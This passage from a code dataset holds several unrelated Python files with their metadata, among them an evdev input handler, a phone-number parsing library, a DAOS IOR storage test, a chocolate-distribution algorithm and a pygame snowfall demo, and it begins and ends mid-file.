\"ignore\"\n else:\n result = \"ignore\"\n self._last_value = value\n self._last_value_ts = event_ts\n return result\n\nclass EventDevice(BaseInputDevice):\n def __init__(self, config, section, main_loop, device):\n self._done = False\n self.device = device\n self.name = \"{} ({})\".format(device.name, device.fn)\n self._event_map = {}\n BaseInputDevice.__init__(self, config, section, main_loop)\n\n def load_keymap(self):\n \"\"\"Process `self.keymap_config` ConfigParser object to build internal\n input event to EventHandler object mapping.\n \"\"\"\n for section in self.keymap_config:\n if section.startswith(\"KEY_\") or section.startswith(\"BTN_\"):\n try:\n ecode = evdev.ecodes.ecodes[section]\n except KeyError:\n logger.warning(\"Unknown key name: %r\", section)\n continue\n handler_class = KeyEventHandler\n ev_type = EV_KEY\n elif section.startswith(\"ABS_\"):\n try:\n ecode = evdev.ecodes.ecodes[section]\n except KeyError:\n logger.warning(\"Unknown axis name: %r\", section)\n continue\n handler_class = AbsEventHandler\n ev_type = EV_ABS\n else:\n continue\n key = (ev_type, ecode)\n settings = self.keymap_config[section]\n handler = handler_class(self, key, settings)\n self._event_map[key] = handler\n\n def stop(self):\n \"\"\"Stop processing events.\"\"\"\n self._done = True\n self.device.close()\n\n async def __aiter__(self):\n return self\n\n async def __anext__(self):\n async for event in self.device.async_read_loop():\n if self._done:\n raise StopAsyncIteration\n ev_type = event.type\n ev_code = event.code\n event = evdev.categorize(event)\n handler = self._event_map.get((ev_type, ev_code))\n if handler:\n msg = handler.translate(event)\n if msg is not None:\n return msg\n async def get_key(self):\n \"\"\"Read single keypress from the device.\"\"\"\n key_name = None\n try:\n # flush queued events\n self.device.read()\n except BlockingIOError:\n pass\n async for event in self.device.async_read_loop():\n ev_type = event.type\n ev_code = event.code\n key_name = evdev.ecodes.bytype[ev_type].get(ev_code, str(ev_code))\n if ev_type == EV_KEY:\n key_event = evdev.events.KeyEvent(event)\n if key_event.keystate != key_event.key_down:\n continue\n else:\n # FIXME: EV_ABS\n continue\n break\n if isinstance(key_name, list):\n key_name = key_name[0]\n return key_name\n\ndef input_device_factory(config, section, main_loop):\n try:\n name = config[section][\"name\"]\n except KeyError:\n name = \".*\"\n input_device_re = re.compile(name)\n devices = [evdev.InputDevice(fn) for fn in evdev.list_devices()]\n devices = [dev for dev in devices if input_device_re.match(dev.name)]\n if not devices:\n logger.debug(\"[%s]: no device matches name %r\", section, name)\n return\n for device in devices:\n try:\n handler = EventDevice(config, section, main_loop, device)\n except Exception as err:\n logger.warning(\"[%s]: cannot load event device: %s\", section, err)\n logger.debug(\"Exception:\", exc_info=True)\n continue\n yield handler\n","sub_path":"badumtss_machine/input/evdev.py","file_name":"evdev.py","file_ext":"py","file_size_in_byte":8799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"373678608","text":"from dagster_graphql.test.utils import execute_dagster_graphql\n\nfrom .setup import define_test_context\n\nSNAPSHOT_QUERY = '''\nquery PipelineSnapshotQuery($snapshotId: String!) 
{\n pipelineSnapshot(snapshotId: $snapshotId) {\n name\n description\n runtimeTypes { key }\n solids { name }\n runs { runId } \n modes { name }\n solidHandles { handleID }\n tags { key value }\n }\n}\n'''\n\n\ndef test_query_snapshot(snapshot):\n result = execute_dagster_graphql(\n define_test_context(), SNAPSHOT_QUERY, {'snapshotId': 'csv_hello_world'}\n )\n\n assert not result.errors\n assert result.data\n\n snapshot.assert_match(result.data)\n","sub_path":"python_modules/dagster-graphql/dagster_graphql_tests/graphql/test_pipeline_snapshot.py","file_name":"test_pipeline_snapshot.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"496025353","text":"# TC: O(n log n) | SC: O(n)\ndef solution_1(packets, kids):\n # sort\n packets.sort()\n start = 0\n end = kids-1\n min_diff = packets[-1]-packets[0]\n\n # Check all possible subarry for min difference.\n while end < len(packets):\n min_diff = min(min_diff, (packets[end]-packets[start]))\n start += 1\n end += 1\n\n return min_diff\n\n\nif __name__ == '__main__':\n packets = [3, 4, 1, 9, 56, 7, 9, 12]\n kids = 5\n\n # packets = [7, 3, 2, 4, 9, 12, 56]\n # kids = 3\n\n # packets = [7, 3, 2, 4, 9, 12, 56]\n # kids = 3\n\n # packets = [3, 4, 1, 9, 56, 7, 9, 12]\n # kids = 5\n\n # packets = [12, 4, 7, 9, 2, 23, 25, 41, 30, 40, 28, 42, 30, 44, 48, 43, 50]\n # kids = 7\n\n print('solution_1: ', solution_1(packets, kids))\n","sub_path":"array/python3/30_chocolate_distribution.py","file_name":"30_chocolate_distribution.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"126378679","text":"\"\"\"\nCrappy phone number library.\n\nSee test_phonenumber.py for more information\n\"\"\"\n\nimport re\nimport urllib\n\nPHONENO_URI = re.compile(\"(<|^)(sip|sips|tel):(?P<phoneno>\\+?\\d+)\")\nNANP_NUMBER = re.compile(\"^(?P<npa>[2-9]\\d\\d)(?P<nxx>[2-9]\\d\\d)(?P<station>\\d\\d\\d\\d)$\")\nNANP_COUNTRIES = ('US', 'CA', 'BB', 'BM', 'JM', 'BS', 'GU', 'GD', 'PR',\n 'KN', 'MS', 'KY', 'DO', 'DM', 'LC', 'TT', 'TC', 'VC',\n 'AG', 'VG', 'AI', 'VI', 'AS')\nEU_COUNTRIES = ('AT', 'BE', 'BG', 'CY', 'CZ', 'DK', 'EE', 'FI', 'FR',\n 'DE', 'GR', 'HU', 'IE', 'IT', 'LV', 'LT', 'LU', 'MT',\n 'NL', 'PL', 'PT', 'RO', 'SK', 'SI', 'ES', 'SE', 'GB')\nCANADIAN_NPA = ('204', '250', '306', '403', '416', '418', '438',\n '450', '514', '519', '581', '604', '613', '647',\n '778', '289', '226', '587', '506', '705', '709',\n '807', '819', '867', '780', '902', '905')\nDOMINICAN_REPUBLIC_NPA = ('809', '829', '849')\nTOLL_FREE_NPA = ('800', '866', '877', '888')\nIS_PREMIUM_RATE = re.compile(\"^1900|^1[2-9]\\d\\d976\")\nCOUNTRY_DIALING_PREFIX = {\n 'US': '1',\n 'CA': '1',\n 'KY': '1',\n 'DO': '1',\n 'DM': '1',\n 'LC': '1',\n 'TT': '1',\n 'AS': '1',\n 'TC': '1',\n 'VC': '1',\n 'AG': '1',\n 'VG': '1',\n 'AI': '1',\n 'VI': '1',\n 'BB': '1',\n 'BM': '1',\n 'JM': '1',\n 'BS': '1',\n 'GU': '1',\n 'GD': '1',\n 'PR': '1',\n 'KN': '1',\n 'MS': '1',\n 'FR': '33',\n 'GB': '44',\n 'BE': '32',\n 'IT': '39',\n 'IR': '98',\n 'ES': '34',\n 'NL': '31',\n 'MX': '52',\n 'RU': '7',\n 'CN': '86',\n 'JP': '81',\n 'LT': '370',\n 'BD': '880',\n 'BF': '226',\n 'BG': '359',\n 'WF': '681',\n 'BN': '673',\n 'BO': '591',\n 'BH': '973',\n 'BI': '257',\n 'BJ': '229',\n 'BT': '975',\n 'BW': '267',\n 'WS': '685',\n 'BR': '55',\n 'BY': '375',\n 'BZ': '501',\n 'RW': '250',\n 'RE': '262',\n 'TM': '993',\n 'TJ': '992',\n 'RO': '40',\n 'TK': 
'690',\n 'GW': '245',\n 'GT': '502',\n 'GR': '30',\n 'GQ': '240',\n 'GP': '590',\n 'GY': '592',\n 'GF': '594',\n 'GE': '995',\n 'GA': '241',\n 'GN': '224',\n 'GM': '220',\n 'GL': '299',\n 'GI': '350',\n 'GH': '233',\n 'OM': '968',\n 'TN': '216',\n 'JO': '962',\n 'HT': '509',\n 'HU': '36',\n 'HK': '852',\n 'HN': '504',\n 'VE': '58',\n 'PS': '970',\n 'PW': '680',\n 'PT': '351',\n 'AF': '93',\n 'IQ': '964',\n 'PA': '507',\n 'PF': '689',\n 'PG': '675',\n 'PE': '51',\n 'PK': '92',\n 'PH': '63',\n 'PL': '48',\n 'ZM': '260',\n 'EE': '372',\n 'EG': '20',\n 'ZA': '27',\n 'EC': '593',\n 'VN': '84',\n 'ET': '251',\n 'SO': '252',\n 'ZW': '263',\n 'SA': '966',\n 'ER': '291',\n 'MD': '373',\n 'MG': '261',\n 'MA': '212',\n 'MC': '377',\n 'UZ': '998',\n 'MM': '95',\n 'ML': '223',\n 'MO': '853',\n 'MN': '976',\n 'MH': '692',\n 'MU': '230',\n 'MT': '356',\n 'MW': '265',\n 'MV': '960',\n 'MQ': '596',\n 'PY': '595',\n 'MR': '222',\n 'UG': '256',\n 'MY': '60',\n 'IL': '972',\n 'SH': '290',\n 'FI': '358',\n 'FJ': '679',\n 'FK': '500',\n 'FM': '691',\n 'NI': '505',\n 'NO': '47',\n 'NA': '264',\n 'VU': '678',\n 'NC': '687',\n 'NE': '227',\n 'NG': '234',\n 'NZ': '64',\n 'NP': '977',\n 'NR': '674',\n 'NU': '683',\n 'CK': '682',\n 'CI': '225',\n 'CH': '41',\n 'CO': '57',\n 'CM': '237',\n 'CL': '56',\n 'CG': '242',\n 'CF': '236',\n 'CD': '243',\n 'CZ': '420',\n 'CY': '357',\n 'CR': '506',\n 'CU': '53',\n 'SZ': '268',\n 'SY': '963',\n 'KG': '996',\n 'KE': '254',\n 'SR': '597',\n 'KI': '686',\n 'KH': '855',\n 'SV': '503',\n 'KM': '269',\n 'ST': '239',\n 'SK': '421',\n 'KR': '82',\n 'KP': '850',\n 'KW': '965',\n 'SN': '221',\n 'SM': '378',\n 'SL': '232',\n 'SC': '248',\n 'SB': '677',\n 'SG': '65',\n 'SE': '46',\n 'SD': '249',\n 'DJ': '253',\n 'DK': '45',\n 'DE': '49',\n 'YE': '967',\n 'DZ': '213',\n 'UY': '598',\n 'LB': '961',\n 'LA': '856',\n 'TV': '688',\n 'TW': '886',\n 'TR': '90',\n 'LK': '94',\n 'LI': '423',\n 'LV': '371',\n 'TO': '676',\n 'TL': '670',\n 'LU': '352',\n 'LR': '231',\n 'LS': '266',\n 'TH': '66',\n 'TG': '228',\n 'TD': '235',\n 'LY': '218',\n 'VA': '379',\n 'AC': '247',\n 'AE': '971',\n 'AD': '376',\n 'IS': '354',\n 'AM': '374',\n 'AL': '355',\n 'AO': '244',\n 'AN': '599',\n 'AR': '54',\n 'AU': '61',\n 'AT': '43',\n 'AW': '297',\n 'IN': '91',\n 'TZ': '255',\n 'AZ': '994',\n 'IE': '353',\n 'ID': '62',\n 'QA': '974',\n 'MZ': '258',\n 'UA': '380',\n 'CS': '381',\n 'HR': '385',\n 'SI': '386',\n 'BA': '387',\n 'MK': '389',\n}\n\ndef easy_parse(number, country='US', default=None):\n try:\n return add_plus(parse_pstn_number(strip_uri(number), country))\n except InvalidPSTNNumber:\n if default is not None:\n return default\n else:\n return number\n\ndef easy_format(number, country='US', default=None):\n try:\n return e164_format(parse_pstn_number(number, country), country)\n except InvalidPSTNNumber:\n if default is not None:\n return default\n else:\n return number\n\ndef strip_uri(uri):\n m = PHONENO_URI.search(urllib.unquote(uri))\n if m:\n return m.group('phoneno')\n else:\n return uri\n\ndef i_said_ascii_god_damnit(s):\n if not s:\n return ''\n if isinstance(s, str):\n s = s.decode('utf-8', 'ignore')\n assert isinstance(s, unicode)\n return s.encode('ascii', 'ignore')\n\nclass InvalidPSTNNumber(ValueError):\n def __init__(self, phoneno=None):\n self.phoneno = phoneno\n\n __str__ = lambda self: \"%s\" % (self.phoneno)\n __repr__ = lambda self: \"<%s: %s>\" % (self.__class__.__name__, self)\n\ndef e164_to_country(phoneno, default=None):\n \"\"\"Falls back to 'US' if not sure. 
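Illustrative: e164_to_country('+12046661234') gives 'CA' (204 is a Canadian NPA),\nwhile e164_to_country('+33123456789') gives 'FR'. 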
Don't pass naked e164\"\"\"\n if not phoneno:\n return default\n (cdp, number) = e164_split(phoneno)\n if not cdp:\n return default\n if cdp == '1':\n if len(number) != 10:\n return 'US'\n if is_canadian(phoneno):\n return 'CA'\n if is_dominican_republic(phoneno):\n return 'DO'\n return 'US'\n for country, cdp2 in COUNTRY_DIALING_PREFIX.items():\n if cdp == cdp2:\n return country\n return default\n\ndef strip_prefixes(phoneno):\n phoneno = phoneno.lstrip('+')\n if phoneno.startswith('011'):\n phoneno = phoneno[3:]\n if phoneno.startswith('00'):\n phoneno = phoneno[2:]\n return phoneno\n\ndef e164_split(phoneno):\n \"\"\"\n Heuristic to take a phone number and return a tuple with the\n country dialing prefix and digits after the country prefix.\n Returns (None, None) if it gets confused.\n\n Supports naked e164, even if it is prefixed with: +/011/00\n\n Examples:\n\n assert e164_split('12036660420') == ('1', '2036660420')\n assert e164_split('+12036660420') == ('1', '2036660420')\n assert e164_split('01144123456789') == ('44', '123456789')\n assert e164_split('44123456789') == ('44', '123456789')\n\n \"\"\"\n if not phoneno:\n return (None, None)\n if phoneno.startswith(\"+\"):\n phoneno = phoneno[1:]\n phoneno = re.sub(r\"\\D\", \"\", phoneno)\n if len(phoneno) < 5:\n return (None, None)\n if phoneno.startswith('011'):\n phoneno = phoneno[3:]\n if phoneno.startswith('00'):\n phoneno = phoneno[2:]\n if len(phoneno) < 5 or phoneno[0] == '0':\n return (None, None)\n if int(phoneno[0]) in (1, 7): # 1st and 2nd world\n return (phoneno[0], phoneno[1:])\n if int(phoneno[:2]) in ( # all 2 digit country dialing codes\n 20, 27, 30, 31, 32, 33, 34, 36, 39, 40, 41, 43, 44, 45, 46, 47, 48,\n 49, 51, 52, 53, 54, 55, 56, 57, 58, 60, 61, 62, 63, 64, 65, 66, 81,\n 82, 84, 86, 90, 91, 92, 93, 94, 95, 98):\n return (phoneno[:2], phoneno[2:])\n else:\n return (phoneno[:3], phoneno[3:])\n\ndef e164_format(phoneno, country=None, text_names=True):\n \"\"\"\n If the number doesn't appear sane, this function will spit it back\n as is. If the number is for a country we don't know about, we\n shuold show the number in i18n format with a + prefix and country\n code.\n\n Country is the country code for the user. When formatting numbers\n for this user's country we will exclude the country code. 
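For example (illustrative): e164_format('12036661234', country='US') yields\n'203-666-1234', while e164_format('12036661234') alone yields '+1 203-666-1234'. 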
We only\n take out the country code when we have a really good grasp on the\n formatting for a particular country.\n \"\"\"\n phoneno = i_said_ascii_god_damnit(phoneno)\n if not phoneno:\n return u'Unavailable'\n if text_names and phoneno.strip().lower() in ('', 'unavailable', 'unknown'):\n return u'Unavailable'\n if text_names and phoneno.strip().lower() in ('anonymous', 'withheld', 'private'):\n return u'Anonymous'\n\n (cc, number) = e164_split(phoneno)\n if not cc or not number:\n return phoneno\n res = None\n trunk = None\n include_cc = True\n\n if cc == '1': # NANP: +1 (203) 666-1234 or 203-666-1234\n if country and country in NANP_COUNTRIES:\n include_cc = False\n m = NANP_NUMBER.search(number)\n if m: res = \"%s-%s-%s\" % (m.group('npa'), m.group('nxx'), m.group('station'))\n elif cc == '44': # UK: http://en.wikipedia.org/wiki/Telephone_numbers_in_the_United_Kingdom\n if country and country == 'GB':\n include_cc = False\n m = re.search(\"^(?P<area>1\\d1|11\\d|8\\d\\d)(?P<area2>\\d{3})(?P<station>\\d+)$\", number)\n if m:\n res = \"%s %s %s\" % (m.group('area'), m.group('area2'), m.group('station'))\n else:\n m = re.search(\"^(?P<area>[17]\\d\\d\\d)(?P<station>\\d+)$\", number)\n if m: res = \"%s %s\" % (m.group('area'), m.group('station'))\n m = re.search(\"^(?P<area>[235]\\d)(?P<area2>\\d{4})(?P<station>\\d+)$\", number)\n if m: res = \"%s %s %s\" % (m.group('area'), m.group('area2'), m.group('station'))\n if res:\n trunk = '0'\n elif cc == '33': # France: +33 09 12 34 56 78\n if country and country == 'FR':\n include_cc = False\n if len(number) == 9 and number[0] != '0':\n trunk = '0'\n res = \"%s %s %s %s %s\" % (number[0], number[1:3], number[3:5], number[5:7], number[7:9])\n\n if res is None:\n return \"+%s %s\" % (cc, number)\n if include_cc:\n if trunk is not None:\n res = \"(%s)%s\" % (trunk, res)\n return \"+%s %s\" % (cc, res)\n else:\n if trunk is not None:\n return \"%s%s\" % (trunk, res)\n else:\n return res\n\ndef parse_pstn_number(phoneno, country=None):\n \"\"\"Returns a naked e164 number or raises hell\"\"\"\n if not phoneno:\n raise InvalidPSTNNumber(phoneno)\n phoneno = i_said_ascii_god_damnit(phoneno)\n phoneno = re.sub(r\"[^+0-9]\", \"\", phoneno)\n if len(phoneno) > 32:\n raise InvalidPSTNNumber(phoneno)\n if phoneno.startswith('+1'):\n phoneno = phoneno[1:]\n if phoneno.startswith('+'):\n phoneno = '011' + phoneno[1:]\n if '+' in phoneno:\n raise InvalidPSTNNumber(phoneno)\n if phoneno.startswith('011') or phoneno.startswith('00'):\n # International, or is it?\n if phoneno.startswith('001'):\n phoneno = phoneno[2:]\n elif phoneno.startswith('0111'):\n phoneno = phoneno[3:]\n else:\n (cdp, no) = e164_split(phoneno)\n if cdp is not None and len(no) >= 5:\n if no[0] == '0': # they left in the trunk prefix *sigh*\n if cdp != '39': # italy is a weird exception\n no = no[1:]\n return \"%s%s\" % (cdp, no)\n if phoneno.startswith('1') and re.search(\"^1[2-9]\\d\\d[2-9]\\d{6}$\", phoneno):\n return phoneno\n if phoneno.startswith('0') and country:\n # non-nanp natl dialing\n cdp = prefix_for_country(country)\n if cdp != '1' and len(phoneno[1:]) >= 5:\n if cdp == '39': # italy keeps trunk prefix\n return '%s%s' % (cdp, phoneno)\n else:\n return '%s%s' % (cdp, phoneno[1:])\n if country and country in NANP_COUNTRIES and re.search(\"^[2-9]\\d\\d[2-9]\\d{6}$\", phoneno):\n # nanp natl dialing w/o 1\n return \"1%s\" % (phoneno)\n raise InvalidPSTNNumber(phoneno)\n\ndef parse_caller_id(cid, country=None):\n try:\n return parse_pstn_number(cid, country)\n except 
InvalidPSTNNumber:\n return ''\n\ndef country_in_nanp(country):\n assert len(country) == 2\n assert country == country.upper()\n return country.upper() in NANP_COUNTRIES\n\ndef cdp(phoneno):\n (cdp, number) = e164_split(phoneno)\n return cdp\n\ndef npa(phoneno):\n \"\"\"10 digit numbers only\"\"\"\n return phoneno[0:3]\n\ndef nxx(phoneno):\n \"\"\"10 digit numbers only\"\"\"\n return phoneno[3:6]\n\ndef is_toll_free(phoneno):\n \"\"\"Only supports NANP for now\"\"\"\n (cdp, number) = e164_split(phoneno)\n return (cdp == '1' and npa(number) in TOLL_FREE_NPA)\n\ndef is_premium_rate(phoneno):\n \"\"\"Only supports NANP for now\"\"\"\n (cdp, number) = e164_split(phoneno)\n return (cdp == '1' and bool(re.search(IS_PREMIUM_RATE, cdp + number)))\n\ndef is_canadian(phoneno):\n (cdp, number) = e164_split(phoneno)\n return (cdp == '1' and npa(number) in CANADIAN_NPA)\n\ndef is_dominican_republic(phoneno):\n (cdp, number) = e164_split(phoneno)\n return (cdp == '1' and npa(number) in DOMINICAN_REPUBLIC_NPA)\n\ndef prefix_for_country(country, default=None):\n return COUNTRY_DIALING_PREFIX.get(country, default)\n\ndef e164_to_nanp(phoneno):\n if not phoneno:\n return phoneno\n phoneno = phoneno.lstrip('+')\n if phoneno.startswith('1'):\n return phoneno\n else:\n return '011' + phoneno\n\ndef add_plus(phoneno):\n if not phoneno:\n return phoneno\n return '+' + phoneno.lstrip('+')\n","sub_path":"django_extensions/l10n/phonenumber.py","file_name":"phonenumber.py","file_ext":"py","file_size_in_byte":13943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"267246826","text":"#!/usr/bin/python\n'''\n (C) Copyright 2018-2019 Intel Corporation.\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\n GOVERNMENT LICENSE RIGHTS-OPEN SOURCE SOFTWARE\n The Government's rights to use, modify, reproduce, release, perform, display,\n or disclose this software are subject to the terms of the Apache License as\n provided in Contract No. 
B609815.\n    Any reproduction of computer software, computer software documentation, or\n    portions thereof marked with this legend must also reproduce the markings.\n'''\nfrom __future__ import print_function\n\nimport os\nimport json\n\nfrom apricot import Test\n\nimport agent_utils\nimport server_utils\nimport write_host_file\nimport ior_utils\nfrom daos_api import DaosContext, DaosPool, DaosApiError\n\nclass IorSingleServer(Test):\n    \"\"\"\n    Tests IOR with Single Server config.\n    :avocado: recursive\n    \"\"\"\n    def setUp(self):\n        # get paths from the build_vars generated by build\n        with open('../../../.build_vars.json') as build_file:\n            build_paths = json.load(build_file)\n        self.basepath = os.path.normpath(build_paths['PREFIX'] + \"/../\")\n\n        self.server_group = self.params.get(\"name\", '/server_config/',\n                                            'daos_server')\n        self.daosctl = self.basepath + '/install/bin/daosctl'\n\n        # setup the DAOS python API\n        self.context = DaosContext(build_paths['PREFIX'] + '/lib/')\n        self.pool = None\n\n        self.hostlist_servers = self.params.get(\"test_servers\",\n                                                '/run/hosts/test_machines/*')\n        self.hostfile_servers = (\n            write_host_file.write_host_file(self.hostlist_servers,\n                                            self.workdir))\n        print(\"Host file servers is: {}\".format(self.hostfile_servers))\n\n        self.hostlist_clients = self.params.get(\"test_clients\",\n                                                '/run/hosts/test_machines/*')\n        self.hostfile_clients = (\n            write_host_file.write_host_file(self.hostlist_clients,\n                                            self.workdir, None))\n        print(\"Host file clients is: {}\".format(self.hostfile_clients))\n\n        # set ior_flags and object class to be used by test\n        self.ior_flags = self.params.get(\"F\", '/run/ior/iorflags/')\n        self.object_class = self.params.get(\"o\", '/run/ior/objectclass/')\n\n        self.agent_sessions = agent_utils.run_agent(self.basepath,\n                                                    self.hostlist_servers,\n                                                    self.hostlist_clients)\n        server_utils.run_server(self.hostfile_servers, self.server_group,\n                                self.basepath)\n\n    def tearDown(self):\n        try:\n            if self.hostfile_clients is not None:\n                os.remove(self.hostfile_clients)\n            if self.hostfile_servers is not None:\n                os.remove(self.hostfile_servers)\n            if self.pool is not None and self.pool.attached:\n                self.pool.destroy(1)\n        finally:\n            if self.agent_sessions:\n                agent_utils.stop_agent(self.agent_sessions,\n                                       self.hostlist_clients)\n            server_utils.stop_server(hosts=self.hostlist_servers)\n\n    def test_singleserver(self):\n        \"\"\"\n        Test IOR with Single Server config.\n\n        :avocado: tags=ior,singleserver\n        \"\"\"\n\n        # parameters used in pool create\n        createmode = self.params.get(\"mode\", '/run/createtests/createmode/*/')\n        createuid = os.geteuid()\n        creategid = os.getegid()\n        createsetid = self.params.get(\"setname\", '/run/createtests/createset/')\n        createsize = self.params.get(\"size\", '/run/createtests/createsize/')\n        createsvc = self.params.get(\"svcn\", '/run/createtests/createsvc/')\n\n        # ior parameters\n        client_processes = self.params.get(\"np\", '/run/ior/client_processes/*/')\n        iteration = self.params.get(\"iter\", '/run/ior/iteration/')\n        transfer_size = self.params.get(\"t\",\n                                        '/run/ior/transfersize_blocksize/*/')\n        block_size = self.params.get(\"b\", '/run/ior/transfersize_blocksize/*/')\n\n        try:\n            # initialize a python pool object then create the underlying\n            # daos storage\n            self.pool = DaosPool(self.context)\n            self.pool.create(createmode, createuid, creategid,\n                             createsize, createsetid, None, None, createsvc)\n            pool_uuid = self.pool.get_uuid_str()\n            print(\"pool_uuid: {}\".format(pool_uuid))\n            tmp_rank_list = []\n            svc_list = \"\"\n            for item in 
range(createsvc):\n                tmp_rank_list.append(int(self.pool.svc.rl_ranks[item]))\n                svc_list += str(tmp_rank_list[item]) + \":\"\n            svc_list = svc_list[:-1]\n\n            ior_utils.run_ior_daos(self.hostfile_clients, self.ior_flags,\n                                   iteration, block_size, transfer_size,\n                                   pool_uuid, svc_list, self.object_class,\n                                   self.basepath, client_processes)\n\n        except (DaosApiError, ior_utils.IorFailed) as excep:\n            self.fail(\"<Single Server Test FAILED>\\n {}\".format(excep))\n","sub_path":"src/tests/ftest/io/ior_single_server.py","file_name":"ior_single_server.py","file_ext":"py","file_size_in_byte":5839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"596136723","text":"from matplotlib import pyplot as plt\nimport numpy as np\n\nclass coor:\n    def __init__(self,x_coor=[0,10,0,0,10,10,0,10],y_coor = [0,0,10,0,10,0,10,10], z_coor = [0,0,0,10,0,10,10,10],persp_ref_pt = [0,0,-30], z_v = 100):\n        self.x_co = x_coor.copy()\n        self.y_co = y_coor.copy()\n        self.z_co = z_coor.copy()\n        self.persp_ref = persp_ref_pt\n        self.z_vp = z_v\n    \n    def modeling_to_perspective(self):\n        x_co_p = []\n        y_co_p = []\n        persp_refa = self.persp_ref\n        for i in zip(self.x_co,self.y_co,self.z_co):\n            print(i)\n            a = i[0]*(persp_refa[2]-self.z_vp)/(persp_refa[2]-i[2])+persp_refa[0]*(self.z_vp - i[2])/(persp_refa[2]-i[2])\n            b = i[1]*(persp_refa[2]-self.z_vp)/(persp_refa[2]-i[2])+persp_refa[1]*(self.z_vp - i[2])/(persp_refa[2]-i[2])\n            x_co_p.append(a)\n            y_co_p.append(b)\n        return (x_co_p, y_co_p)\n\na = coor()\na.modeling_to_perspective()\nplt.show()","sub_path":"Source COde/3Dstuff.py","file_name":"3Dstuff.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"102354750","text":"import pygame\nimport sys\nimport random\n\npygame.init()\n\n# Colors\nblack = (0, 0, 0)\nwhite = (255, 255, 255)\ngreen = (0, 255, 0)\nred = (255, 0, 0)\nblue = (0, 0, 255)\n\nSCREEN_WIDTH = 700\nSCREEN_HEIGHT = 500\nSCREEN_TOP = int(SCREEN_HEIGHT - SCREEN_HEIGHT + SCREEN_HEIGHT / 20)\nSCREEN_BOTTOM = int(SCREEN_HEIGHT)\nwindow_size = (SCREEN_WIDTH, SCREEN_HEIGHT)\n\nscreen = pygame.display.set_mode(window_size)\npygame.display.set_caption(\"Sain's World\")\n\nrunning = True\n\nclock = pygame.time.Clock()\n\nfont = pygame.font.Font(None, 25)\ntext = font.render(\"Sain's World\", True, white)\ntext_rect = text.get_rect(center=(SCREEN_WIDTH/2, SCREEN_TOP))\n\nkeys = pygame.key.get_pressed()\nmove_ticker = 0\n\nplayerX = 50\nplayerY = 50\n\nmax_snow = 100\nsnow_list = []\n\nfor i in range(max_snow):\n    snowX = random.randrange(0, SCREEN_WIDTH)\n    snowY = random.randrange(0, SCREEN_HEIGHT)\n    snow_list.append([snowX, snowY])\n\nwhile running:\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            running = False\n        if event.type == pygame.KEYDOWN:\n            if event.key == pygame.K_LEFT:\n                playerX -= 1\n            if event.key == pygame.K_RIGHT:\n                playerX += 1\n            if event.key == pygame.K_DOWN:\n                playerY += 1\n            if event.key == pygame.K_UP:\n                playerY -= 1\n\n    screen.fill(black)\n\n    screen.blit(text, text_rect)\n\n    # player test character\n    pygame.draw.rect(screen, green, [playerX, playerY, 50, 50])\n\n    for i in range(len(snow_list)):\n        mouse_pos = pygame.mouse.get_pos()\n        mouse_x = mouse_pos[0]\n        mouse_y = mouse_pos[1]\n\n        pygame.draw.circle(screen, white, snow_list[i], 5)\n        snow_list[i][1] += 1\n\n        if snow_list[i][1] > SCREEN_HEIGHT:\n            y = SCREEN_TOP\n            x = random.randrange(0, SCREEN_WIDTH)\n            snow_list[i][1] = y\n            snow_list[i][0] = x\n        if mouse_x == 
snow_list[i][0] and mouse_y == snow_list[i][1]:\n y = SCREEN_TOP\n x = random.randrange(0, SCREEN_WIDTH)\n snow_list[i][1] = y\n snow_list[i][0] = x\n\n pygame.display.flip()\n\n clock.tick(60)\n\npygame.quit()\n\n\"\"\"\"\nclass GameObject:\n def __init__(self, image, height, speed):\n self.speed = speed\n self.image = image\n self.pos = image.get_rect().move(0, height)\n\n def move(self):\n self.pos = self.pos.move(0, self.speed)\n if self.pos.right > 600:\n self.pos.left = 0\n\nscreen = pygame.display.set_mode((640, 480))\nplayer_visible = pygame.image.load('player.bmp').convert()\nbackground = pygame.image.load('background.bmp').convert()\nscreen.blit(background, (0, 0))\nobjects = []\n\nfor x in range(10):\n o = GameObject(player_visible, x*40, x)\n objects.append(o)\nwhile 1:\n for event in pygame.event.get():\n if event.type in (QUIT, KEYDOWN):\n sys.exit()\n for o in objects:\n screen.blit(background, o.pos, o.pos)\n for o in objects:\n o.move()\n\n pygame.display.update()\n pygame.time.delay(100)\n\"\"\"\n","sub_path":"unused/gameWindow.py","file_name":"gameWindow.py","file_ext":"py","file_size_in_byte":3066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"116604614","text":"\"\"\"\nVariable module.\n\"\"\"\n\nimport os\n\nimport requests\n\nimport cwt\n\n__all__ = ['Variable']\n\nclass Variable(cwt.Parameter):\n \"\"\" Variable.\n \n Describes a variable to be used by an Operation.\n\n >>> tas = Variable('http://thredds/tas.nc', 'tas', name='tas')\n\n Attributes:\n uri: A String URI for the file containing the variable data.\n var_name: A String name of the variable.\n domains: List of cwt.Domain objects to constrain the variable data.\n mime_type: A String name of the URI mime-type.\n name: Custom name of the Variable.\n \"\"\"\n def __init__(self, uri, var_name, **kwargs):\n \"\"\" Variable init. \"\"\"\n super(Variable, self).__init__(kwargs.get('name', None))\n\n self.uri = uri\n self.var_name = var_name\n\n domains = kwargs.get('domains', None)\n\n if domains and isinstance(domains, cwt.Domain):\n domains = [domains]\n\n self.domains = domains\n self.mime_type = kwargs.get('mime_type', None)\n\n @classmethod\n def from_dict(cls, data):\n \"\"\" Create variable from dict representation. \"\"\"\n uri = None\n\n if 'uri' in data:\n uri = data['uri']\n else:\n raise 